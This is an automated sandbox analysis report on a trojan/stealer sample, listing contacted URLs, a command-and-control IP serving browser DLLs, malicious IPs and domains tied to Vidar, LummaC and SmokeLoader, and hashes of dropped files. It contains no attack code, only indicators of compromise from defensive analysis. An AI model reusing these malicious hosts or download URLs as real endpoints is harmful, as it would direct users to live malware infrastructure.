https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2037923466.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037895946.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037402622.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59/softokn3.dllel	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dllSessionKeyBackward	kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59/sqls.dll)	kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199689717899/badges	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	A247.exe, 00000005.00000003.2427616680.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://65.109.242.59	76561199689717899[1].htm.9.dr	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/msvcp140.dlld	kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/nss3.dllAppData	kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://rpi.net.au/~ajohnson/resourcehacker	5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000000.2672680740.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, kat2225.tmp.8.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/	76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
http://127.0.0.1:27060	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/42.59ine	kat2225.tmp, 00000009.00000003.2985489790.0000000000867000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli	kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown
https://api.steampowered.com/	kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.145.40.124	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
190.187.52.42	dbfhns.in	Peru	19180	AMERICATELPERUSAPE	true
23.67.133.187	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	true
88.225.215.104	unknown	Turkey	9121	TTNETTR	true
188.114.96.3	whispedwoodmoodsksl.shop	European Union	13335	CLOUDFLARENETUS	true
185.235.137.54	unknown	Iran (ISLAMIC Republic Of)	202391	AFRARASAIR	false
65.109.242.59	unknown	United States	11022	ALABANZA-BALTUS	false
91.202.233.231	unknown	Russian Federation	9009	M247GB	true
45.129.96.86	unknown	Estonia	208440	GMHOST-EE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447653
Start date and time:	2024-05-26 10:29:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@14/35@5/9
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 96% Number of executed functions: 66 Number of non-executed functions: 247
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target kat2225.tmp, PID 6716 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:30:00	API Interceptor	439934x Sleep call for process: explorer.exe modified
04:30:29	API Interceptor	8x Sleep call for process: A247.exe modified
04:31:09	API Interceptor	1x Sleep call for process: kat2225.tmp modified
04:31:19	API Interceptor	1x Sleep call for process: WerFault.exe modified
10:30:17	Task Scheduler	Run new task: Firefox Default Browser Agent 80DE0487F6A80325 path: C:\Users\user\AppData\Roaming\rcjjrra

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.145.40.124	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.145.40.124/pintxi1lv.exe
23.145.40.124	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.145.40.124/pintxi1lv.exe
190.187.52.42	rBwTlpgnjc.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php
	SSDAIG33Zh.exe	Get hash	malicious	Babuk, Djvu	Browse	sdfjhuz.com/dl/build2.exe
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	habrafa.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	fnKtfdi0P0.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, Xmrig	Browse	emgvod.com/uploads/logo3.jpg
	O1yQjHheL6.exe	Get hash	malicious	Amadey, PureLog Stealer, SmokeLoader	Browse	emgvod.com/uploads/logo3.jpg
	Oa5MQwNPBq.exe	Get hash	malicious	LummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader	Browse	habrafa.com/test1/get.php?pid=589A025AAF5058B231B95CD1C4770414
	fcdf869bc179759c8be3093adec60b334d25cad63b78fd3d28229b0af88b765b_dump.exe	Get hash	malicious	SmokeLoader	Browse	sjyey.com/tmp/index.php
	Qkk9UKA1cW.exe	Get hash	malicious	SmokeLoader	Browse	gxutc2c.com/tmp/index.php
	SecuriteInfo.com.Win32.DropperX-gen.5130.14297.exe	Get hash	malicious	SmokeLoader	Browse	gxutc2c.com/tmp/index.php
	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	habrafa.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
23.67.133.187	https://steamcomnumitly.com/get/spring/afaFJ4a/50	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	http://steamcommunici.com/profiles/76567410475250301	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Vidar	Browse
88.225.215.104	llxZDywP35.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, Stealc	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.199.218.33
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	23.210.122.61
	https://bitly.cx/LmuIz	Get hash	malicious	Unknown	Browse	104.102.42.29
	https://steamcomnumitly.com/get/spring/afaFJ4a/50	Get hash	malicious	Unknown	Browse	23.67.133.187
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	mQPyKe8cqn.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
dbfhns.in	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	185.18.245.58
dbfhns.in	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	190.28.110.209
whispedwoodmoodsksl.shop	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	a6lzHWp4pa.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	104.21.77.72
	2WG7HEj7mc.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	TrBsSxexUi.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	JuqFxYIfSi.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	91trXZr1Ts.exe	Get hash	malicious	LummaC	Browse	104.21.77.72
	j6W8OF1uLO.exe	Get hash	malicious	LummaC	Browse	104.21.77.72
	0CmMweT4Wf.exe	Get hash	malicious	LummaC	Browse	172.67.205.94
	TePd86X60h.exe	Get hash	malicious	LummaC	Browse	104.21.77.72

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	QN5PrDr5St.elf	Get hash	malicious	Unknown	Browse	8.6.157.57
	boost.exe	Get hash	malicious	NovaSentinel	Browse	104.21.55.141
	SecuriteInfo.com.decompression.bomb.26030.10641.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.decompression.bomb.26030.10641.exe	Get hash	malicious	Unknown	Browse	104.21.46.8
	wtrD6RiHlm.exe	Get hash	malicious	RedLine	Browse	172.67.19.24
	n4WgIM7VfS.elf	Get hash	malicious	Mirai	Browse	1.8.124.113
	https://newsklikdisini5bekbg0.3bsz4.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://surl.pk/rUrcX	Get hash	malicious	Unknown	Browse	188.114.96.3
SURFAIRWIRELESS-IN-01US	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.145.40.124
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.145.40.124
	jew.x86.elf	Get hash	malicious	Mirai	Browse	23.145.58.16
	4glhPVAaxw.exe	Get hash	malicious	Unknown	Browse	23.145.40.122
	4glhPVAaxw.exe	Get hash	malicious	Unknown	Browse	23.145.40.122
	wsWcTw2vNt.elf	Get hash	malicious	Mirai	Browse	23.145.34.49
	q3K2TwLiUh.elf	Get hash	malicious	Mirai	Browse	23.145.34.37
	WYA25FYPq8.elf	Get hash	malicious	Mirai	Browse	23.145.34.36
	DUGEn9I0cO.elf	Get hash	malicious	Mirai	Browse	23.145.34.35
	RQbg1N3Jd5.elf	Get hash	malicious	Mirai	Browse	23.145.34.54
AMERICATELPERUSAPE	rBwTlpgnjc.exe	Get hash	malicious	SmokeLoader	Browse	190.187.52.42
	E8zldNa4ks.elf	Get hash	malicious	Unknown	Browse	190.187.188.187
	SSDAIG33Zh.exe	Get hash	malicious	Babuk, Djvu	Browse	190.187.52.42
	6A9jBmgfEz.elf	Get hash	malicious	Mirai	Browse	190.187.132.110
	4JJkk655SP.elf	Get hash	malicious	Unknown	Browse	190.187.141.172
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	190.187.52.42
	01vS5TqGur.elf	Get hash	malicious	Mirai	Browse	190.187.141.142
	L5dJXUt9Sz.elf	Get hash	malicious	Mirai	Browse	190.187.141.144
	fnKtfdi0P0.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, Xmrig	Browse	190.187.52.42
	O1yQjHheL6.exe	Get hash	malicious	Amadey, PureLog Stealer, SmokeLoader	Browse	190.187.52.42
AKAMAI-ASN1EU	http://surl.pk/rUrcX	Get hash	malicious	Unknown	Browse	95.101.149.47
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	172.234.69.118
	swift.xls	Get hash	malicious	Unknown	Browse	172.232.4.203
	swift.xls	Get hash	malicious	Unknown	Browse	172.232.4.203
	swift.xls	Get hash	malicious	Unknown	Browse	172.232.4.203
	http://delicious-decorous-army.glitch.me/public/RRENFCONL0.HTML	Get hash	malicious	HTMLPhisher	Browse	104.115.82.33
	https://bitly.cx/LmuIz	Get hash	malicious	Unknown	Browse	95.101.149.47
	https://steamcomnumitly.com/get/spring/afaFJ4a/50	Get hash	malicious	Unknown	Browse	95.101.149.47
	iFTZfjcn8I.elf	Get hash	malicious	Mirai	Browse	95.100.100.176
	phish_alert_iocp_v1.4.48 (2).eml	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	2.16.241.15
TTNETTR	QN5PrDr5St.elf	Get hash	malicious	Unknown	Browse	88.253.165.245
	c0jeXEeVbR.elf	Get hash	malicious	Mirai	Browse	95.14.187.174
	6a7R9UXFMM.elf	Get hash	malicious	Mirai	Browse	88.243.182.27
	6T1S0q3QLa.elf	Get hash	malicious	Mirai	Browse	95.14.46.198
	iFTZfjcn8I.elf	Get hash	malicious	Mirai	Browse	88.252.86.122
	hs1vfUvu3u.elf	Get hash	malicious	Mirai	Browse	85.108.147.45
	wz5CHr5oLF.elf	Get hash	malicious	Mirai	Browse	95.8.187.48
	bR9Ri9cFkm.elf	Get hash	malicious	Unknown	Browse	88.251.249.209
	jZ6ejWIrSV.elf	Get hash	malicious	Gafgyt, Mirai	Browse	88.247.38.42
	IGvLaRmr0J.elf	Get hash	malicious	Gafgyt, Mirai	Browse	88.247.14.23

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	188.114.96.3
	YvF8xPbiml.exe	Get hash	malicious	RisePro Stealer	Browse	188.114.96.3
	swift.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	NFs_468.msi	Get hash	malicious	VMdetect	Browse	188.114.96.3
	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	188.114.96.3
	https://proviaproducts-my.sharepoint.com/:b:/g/personal/bob_rossi_provia_com/EadoUKaCx_pLpRRZlPhQBbkBX2-aayjJ2XxHM4MjJFfXkA?e=7rg6fP	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	188.114.96.3
	Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
51c64c77e60f3980eea90869b68c58a8	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	65.109.242.59
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	file.exe	Get hash	malicious	Vidar	Browse	65.109.242.59
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	65.109.242.59
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	65.109.242.59
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	65.109.242.59
37f463bf4616ecd445d4a1937da06e19	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.67.133.187
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	23.67.133.187
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	23.67.133.187
	SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exe	Get hash	malicious	Unknown	Browse	23.67.133.187
	SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exe	Get hash	malicious	Unknown	Browse	23.67.133.187
	file.exe	Get hash	malicious	Vidar	Browse	23.67.133.187
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse	23.67.133.187
	file.exe	Get hash	malicious	Vidar	Browse	23.67.133.187
	mQPyKe8cqn.exe	Get hash	malicious	Vidar	Browse	23.67.133.187
	SecuriteInfo.com.Win32.Malware-gen.16925.17124.dll	Get hash	malicious	Unknown	Browse	23.67.133.187

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\DGHIECGCBKFH\freebl3.dll	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
C:\ProgramData\DGHIECGCBKFH\mozglue.dll	2.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse
	4.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse

Created / dropped Files

C:\ProgramData\DGHIECGCBKFH\BFBGHD

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\BKFBAK

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
